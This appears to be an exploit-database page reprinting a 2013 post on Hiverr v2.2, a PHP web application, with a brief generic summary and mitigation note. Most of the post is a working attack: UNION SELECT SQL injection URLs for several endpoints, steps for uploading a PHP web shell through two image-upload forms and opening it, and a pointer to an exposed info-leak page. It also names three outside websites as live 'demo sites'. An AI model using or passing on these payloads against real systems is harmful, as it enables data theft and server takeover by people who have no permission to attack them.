header-logo
Suggest Exploit
vendor:
Hiverr v2.2
by:
xStarCode
9
CVSS
HIGH
SQL Injections, Shell Upload, PHP Info Leak
89, 94, 200
CWE
Product Name: Hiverr v2.2
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2013

Hiverr v2.2 Multiple Vulnerabilities

Hiverr v2.2 is vulnerable to multiple vulnerabilities such as SQL Injections, Shell Upload and PHP Info Leak. An attacker can exploit these vulnerabilities to gain access to sensitive information, execute arbitrary code and upload malicious files on the server.

Mitigation:

The application should be updated to the latest version and all the security patches should be applied. The application should be tested for any vulnerabilities and the security should be tightened.
Source

Exploit-DB raw data:

# Exploit Title: Hiverr v2.2 Multiple Vulnerabilities
# Date: 05.02.2013
# Author: xStarCode
# Exploit Author: xStarCode
# Version: 2.2
# Category: webapps
# Google Dork: *
# Tested on: Linux
# Exploit:


-----Index Vulnerabilities:
==>
SQL Injections
http://localhost/gig_desc.php?No=-13+UNION+SELECT+version(),2,3,4,5,6,7,8,9,10,11--
http://localhost/categorygigs.php?category=-0+UNION+SELECT+1,version(),3,4,5,6,7--
http://localhost/categorygigs.php?category=&mny=-100+UNION+SELECT+version(),2,3,4,5,6,7,8,9,10,11--
<==


-----User Panel Vulnerabilities:
==>
SQL Injection
http://localhost/inbox_detail.php?userid=31&recpid=31&gig=-15+UNION+SELECT+1,2,3,version(),5,6,7,8--
<==
-----Multiple Shell Upload:
==>
Go to http://localhost/profilesetting.php
And upload a PHP Shell to "Profile Image"
View source:
<img src="profileimage/*****SHELL*****_.php" alt="image" height="100" width="100">
Go to http://localhost/profileimage/*****SHELL*****_.php
<==
 next -
==>
Go to "Greate Gig" http://localhost/addnewgig.php
And upload a PHP Shell to "Add Image"
View source:
<td width="107">
<img src="gigimages/*****SHELL*****_.php" height="76" width="106">
</td>
Go to http://localhost/gigimages/*****SHELL*****_.php
<==


-----PHP Info Leak:
==>
Go to http://localhost/nitintest.php
<==


# Demo sites:
http://trabajoenlinea.net/
http://aramar.jp/
http://www.seostinger.com/
#
______ Xo
     |
     |
  /  |   \
 ;_/,X_,\_;
\._/x  x\_./
\_./(::)\._/
___ xStarCode
#
Author Mail: xstarcode@vpn.st
Author Website: www.xstarcode.wordpress.com
#

Navigation

Suggest Exploit

Services By CQR